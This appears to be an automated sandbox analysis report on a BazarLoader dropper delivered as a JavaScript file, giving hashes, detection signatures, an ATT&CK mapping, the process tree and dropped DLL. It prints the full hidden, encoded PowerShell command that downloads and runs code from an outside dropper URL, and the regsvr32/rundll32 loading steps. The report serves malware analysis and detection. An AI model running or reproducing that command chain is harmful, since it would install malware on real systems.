bazarloader | 3315cda85556f18f37f62bfea506267d38fa0f864e56017cd8315c73c290b12b

General

Target

Stolen Images Evidence.js
Size

18KB
MD5

e26be3479f0589233e8eb4c61ad4d8cb
SHA1

77828932f8427f43503e7c957a368d1ae2078c24
SHA256

251dba6ce4450b1ce3520ce63b79ea0ebc29e7b67276d4c9ca47ea6db264a612
SHA512

852b1c812ba10ea6fa16d510e1913fa10d765f5842ee1b4df1c449ba7b9ce2c4117ea53ea8858d54d1248cb6165cc995e71401ca65055d93f7763818a8df7be2

Score

10^/10

bazarloader dropper loader

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://polidors.space/333g100/index.php

Signatures

Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.
loader dropper bazarloader

Bazar/Team9 Loader payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2420-138-0x0000000001F20000-0x00000000020D8000-memory.dmp	BazarLoaderVar6
behavioral2/memory/1900-140-0x0000018AFAFE0000-0x0000018AFB198000-memory.dmp	BazarLoaderVar6

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

10 3996 powershell.exe
Loads dropped DLL 2 IoCs

Processes:

regsvr32.exerundll32.exe

pid process

2420 regsvr32.exe
1900 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

3996 powershell.exe
3996 powershell.exe
3996 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3996 powershell.exe

flow	pid	process
10	3996	powershell.exe

pid	process
2420	regsvr32.exe
1900	rundll32.exe

pid	process
3996	powershell.exe
3996	powershell.exe
3996	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3996	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

wscript.execmd.exepowershell.exe

description	pid	process	target process
PID 644 wrote to memory of 2592	644	wscript.exe	cmd.exe
PID 644 wrote to memory of 2592	644	wscript.exe	cmd.exe
PID 2592 wrote to memory of 3996	2592	cmd.exe	powershell.exe
PID 2592 wrote to memory of 3996	2592	cmd.exe	powershell.exe
PID 3996 wrote to memory of 2420	3996	powershell.exe	regsvr32.exe
PID 3996 wrote to memory of 2420	3996	powershell.exe	regsvr32.exe

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcABvAGwAaQBkAG8AcgBzAC4AcwBwAGEAYwBlAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
2⤵
- Suspicious use of WriteProcessMemory
PID:2592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcABvAGwAaQBkAG8AcgBzAC4AcwBwAGEAYwBlAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3996

C:\Windows\System32\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\FlicxLpg.dat
4⤵
- Loads dropped DLL
PID:2420

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\FlicxLpg.dat,DllRegisterServer {C7AFE923-BE68-4F33-BF90-928E414535DB}
1⤵
- Loads dropped DLL
PID:1900

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\FlicxLpg.dat
MD5
312bdc096d35e9a1e448d8457b8623c1

SHA1
840aabd853fd3a67e602623a834335e4f818b0cb

SHA256
3bd73cb37e9b3b0f68be3753d06a3ba50c2f2f86ceab6091a17e9ac777681aad

SHA512
398022b539e9d082a33d929fda91000680883abd9c0bc0ee9fe0803b11c2fc6dea7cf00e92f174fc06f2488f56b1e4c020d9ab836b876d954a8d8d7a0b90c7ad

Download Submit
\Users\Admin\AppData\Local\Temp\FlicxLpg.dat
MD5
312bdc096d35e9a1e448d8457b8623c1

SHA1
840aabd853fd3a67e602623a834335e4f818b0cb

SHA256
3bd73cb37e9b3b0f68be3753d06a3ba50c2f2f86ceab6091a17e9ac777681aad

SHA512
398022b539e9d082a33d929fda91000680883abd9c0bc0ee9fe0803b11c2fc6dea7cf00e92f174fc06f2488f56b1e4c020d9ab836b876d954a8d8d7a0b90c7ad

Download Submit
\Users\Admin\AppData\Local\Temp\FlicxLpg.dat
MD5
312bdc096d35e9a1e448d8457b8623c1

SHA1
840aabd853fd3a67e602623a834335e4f818b0cb

SHA256
3bd73cb37e9b3b0f68be3753d06a3ba50c2f2f86ceab6091a17e9ac777681aad

SHA512
398022b539e9d082a33d929fda91000680883abd9c0bc0ee9fe0803b11c2fc6dea7cf00e92f174fc06f2488f56b1e4c020d9ab836b876d954a8d8d7a0b90c7ad

Download Submit
memory/1900-140-0x0000018AFAFE0000-0x0000018AFB198000-memory.dmp

Filesize
1.7MB

Download
memory/2420-133-0x0000000000000000-mapping.dmp

Download
memory/2420-138-0x0000000001F20000-0x00000000020D8000-memory.dmp

Filesize
1.7MB

Download
memory/2592-114-0x0000000000000000-mapping.dmp

Download
memory/3996-119-0x00000259B9710000-0x00000259B9712000-memory.dmp

Filesize
8KB

Download
memory/3996-129-0x00000259B9710000-0x00000259B9712000-memory.dmp

Filesize
8KB

Download
memory/3996-124-0x00000259B9710000-0x00000259B9712000-memory.dmp

Filesize
8KB

Download
memory/3996-127-0x00000259D3573000-0x00000259D3575000-memory.dmp

Filesize
8KB

Download
memory/3996-126-0x00000259B9710000-0x00000259B9712000-memory.dmp

Filesize
8KB

Download
memory/3996-125-0x00000259D3570000-0x00000259D3572000-memory.dmp

Filesize
8KB

Download
memory/3996-128-0x00000259D4170000-0x00000259D4171000-memory.dmp

Filesize
4KB

Download
memory/3996-122-0x00000259B9710000-0x00000259B9712000-memory.dmp

Filesize
8KB

Download
memory/3996-121-0x00000259B9710000-0x00000259B9712000-memory.dmp

Filesize
8KB

Download
memory/3996-134-0x00000259D3576000-0x00000259D3578000-memory.dmp

Filesize
8KB

Download
memory/3996-135-0x00000259B9710000-0x00000259B9712000-memory.dmp

Filesize
8KB

Download
memory/3996-120-0x00000259D3620000-0x00000259D3621000-memory.dmp

Filesize
4KB

Download
memory/3996-118-0x00000259B9710000-0x00000259B9712000-memory.dmp

Filesize
8KB

Download
memory/3996-117-0x00000259B9710000-0x00000259B9712000-memory.dmp

Filesize
8KB

Download
memory/3996-116-0x00000259B9710000-0x00000259B9712000-memory.dmp

Filesize
8KB

Download
memory/3996-115-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing